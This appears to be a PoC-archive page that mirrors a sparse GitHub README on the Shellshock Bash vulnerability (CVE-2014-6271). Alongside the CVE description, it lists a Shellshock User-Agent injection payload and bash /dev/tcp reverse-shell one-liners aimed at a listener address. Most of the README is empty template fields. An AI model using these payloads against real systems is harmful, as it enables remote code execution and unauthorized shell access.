Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2014-6271 PoC — GNU Bash 远程代码执行漏洞

Source
https://github.com/somhm-solutions/Shell-Shock
Associated Vulnerability
Title:GNU Bash 远程代码执行漏洞 (CVE-2014-6271)
Description:GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka "ShellShock." NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.
Description
*CVE-2014-6271* Unix Arbitrary Code Execution Exploit commonly know as Shell Shock. Examples, Docs, Incident Response and Vulnerability/Risk Assessment, and Additional Resources may be dumped here. Enjoy :)  --- somhmxxghoul  ---
Readme
# **Shell Shock**
***Author(s)**: *ghoul@omhm.org*
***Maintainer(s)**: **
***Department**: *DevOps*
***License(s)**: **


## Overview 
***Shell Shock***: Privelege Escalation, Remote Code Execution
Family of bugs in the Unix Bash Shell. Allow execution of arbitrary commands. 


### Exploitation Vectors
* ****
#### *Payloads*
* shellshock user agent = User-Agent: () { :; } ; <$BASH_COMMAND>	
* rshell payload = bash -i >& /dev/tcp/127.0.0.1
	- rshell redirect to listener = bash -i >& /dev/tcp/$YOUR_IP:$PORT
	
#### Tricks
* 
## **Design**:
* *Purpose*: 
* *Contents*:
* *Server(s)*:
	* *Application*:
	* *Database*:
* *Networking*:
	* *DNS*: 
	* *Routes*: 
* *Application Dependencies*:
* *Dependant Programs*:



## **Basic Usage**:
* *Usage*:
* *Common Use Cases*:

* *Examples*:

## *Testing*
### *Test Input*
* *Parameters*:
* *Actions*:

### Test Output
* *Output*:
* *Screenshots*:
* *Video*:
* *Etc*:

## Notes:* *[option]*:
File Snapshot

 [4.0K]  /data/pocs/051b292033f8dc8fcb08e3fe6d2aba4780949619
└── [ 935]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →